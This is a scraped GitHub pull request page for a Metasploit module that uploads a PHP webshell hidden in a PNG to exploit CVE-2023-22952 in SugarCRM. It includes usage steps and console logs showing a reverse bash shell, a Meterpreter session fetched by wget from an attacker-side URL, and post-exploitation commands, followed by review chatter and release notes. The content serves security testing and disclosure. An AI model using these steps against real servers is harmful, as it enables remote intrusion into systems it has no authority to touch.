metasploit-framework
metasploit-framework copied to clipboard
rapid7
SugarCRM webshell upload RCE [CVE-2023-22952]
This module exploits a Remote Code Execution vulnerability that has been identified in the SugarCRM application.
Using a specially crafted request, custom PHP code can be uploaded embedded in a PNG file and injected through the EmailTemplates because of missing input validation.
Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges under which the web services run (typically user www-data).
SugarCRM 11.0 Professional, Enterprise, Ultimate, Sell and Serve versions 11.0.4 and below are affected. Fixed in release 11.0.5.
SugarCRM 12.0 Enterprise, Sell and Serve versions 12.0.1 and below are affected. Fixed in release 12.0.2.
Verification
- [ ] Start
msfconsole - [ ] use
exploit/linux/http/sugarcrm_webshell_cve_2023_22952 - [ ] set
LHOSTwith target IP - [ ] set
LPORTwith target port - [ ] set
TARGETwith0(UNIX cmd) or1(Linux Dropper) - [ ] exploit
You should get a reverse bash shell or meterpreter session depending on the target setting.
Reverse Bash shell
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending authentication request.
[*] Uploading webshell and retrieving SugarCRM version.
[+] The target is vulnerable. SugarCRM version: 11.0.4 ENT
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted RPXrYGLCvGjL.phar
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-01-19 19:14:56 +0000
whoami
www-data
exit
Linux Meterpreter session
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending authentication request.
[*] Uploading webshell and retrieving SugarCRM version.
[+] The target is vulnerable. SugarCRM version: 11.0.4 ENT
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.254:8080/aLYDt2
[*] Client 127.0.0.1 (Wget/1.16 (linux-gnu)) requested /aLYDt2
[*] Sending payload to 127.0.0.1 (Wget/1.16 (linux-gnu))
[*] Sending stage (3045348 bytes) to 127.0.0.1
[+] Deleted ZxGTSVGsOUZs.phtml
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:43076) at 2023-01-19 19:16:07 +0000
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : sugarcrm
OS : Debian 8.6 (Linux 2.6.32)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > exit
You're on a roll with these things 😄 thanks.
Thanks, have some other nice one's lined up in the pipeline ;-)
Gents, it is not moving. Is there anything that you still need from my side? pcap files were already uploaded a while ago and I tried to address the latest comments.
@h00die-gr3y Reviewed new updates and everything looks good, made one comment though on something that could be fixed for clarity over at https://github.com/rapid7/metasploit-framework/commit/3832b0522670228c9e12ec4f556192330e8eaf28#r100597164 (GitHub doesn't seem to think this is part of this review so sorry for the odd placement) but otherwise nothing looked off 👍
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
You can automate most of these changes with the -a flag:
rubocop -a <directory or file>
Please update your branch after these have been made, and reach out if you have any problems.
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
@h00die-gr3y Getting this error on the backend, think your going to have to add ChunkyPNG as a Gem to Gemfile.lock, the existing file in the Metasploit root, for Bundler to understand that we are adding a new Gem.
You are trying to install in deployment mode after changing
your Gemfile. Run `bundle install` elsewhere and add the
updated Gemfile.lock to version control.
If this is a development machine, remove the
/*redacted*/metasploit-framework/Gemfile freeze
by running `bundle config unset deployment`.
The gemspecs for path gems changed
Added a few commits to fix some issues I found when reviewing this and left 3 review comments I'd like some feedback on. Most of this looks good now. Also rebased since this was quite behind the latest updates on the main branch.
@gwillcox-r7, Typically a sales guy will contact you. Products do not get assigned automatically.
@gwillcox-r7, Typically a sales guy will contact you. Products do not get assigned automatically.
@h00die-gr3y Alright is there any chance then that you could send an updated PCAP capture (believe you sent one a while back), to confirm the new changes work as expected? I can then compare that to the existing module and we can land this if all looks good.
@gwillcox-r7, Typically a sales guy will contact you. Products do not get assigned automatically.
@h00die-gr3y Alright is there any chance then that you could send an updated PCAP capture (believe you sent one a while back), to confirm the new changes work as expected? I can then compare that to the existing module and we can land this if all looks good.
Latest PCAP files are sent.
Release Notes
A module has been added which exploits CVE-2023-22952, a RCE vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. Successful exploitation as an unauthenticated attacker will result in remote code execution as the user running the web services, which is typically www-data.